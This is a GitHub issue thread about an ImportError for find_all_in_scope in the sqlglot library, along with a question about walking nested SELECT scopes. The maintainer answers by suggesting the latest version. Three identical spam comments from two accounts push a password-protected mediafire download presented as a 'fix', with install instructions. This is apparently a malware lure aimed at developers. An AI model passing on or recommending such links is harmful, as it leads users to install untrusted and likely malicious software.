### ISSUE TITLE
Unable to import find_all_in_scope

### ISSUE THREAD

**Issue by bkleck** [tobymao/sqlglot#3976]
When I ran this code block, I got the following error:
```python
from sqlglot.optimizer.scope import find_all_in_scope
``` 

ImportError: cannot import name 'find_all_in_scope' from 'sqlglot.optimizer.scope' (/Users/bytedance/python /.venv/lib/python3.9/site-packages/sqlglot/optimizer/scope.py)"
}

May I find how to solve this? Thank you!
On another note, when I am traversing through scopes, I realised that when there is a nested subquery, and I use something like "for select in scope.find_all(exp.Select):", I get all instances of SELECT statements. How do I iterate through the SELECT statements 1 level at a time?

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tobymao** [comment]
works for me, try installing the latest version.
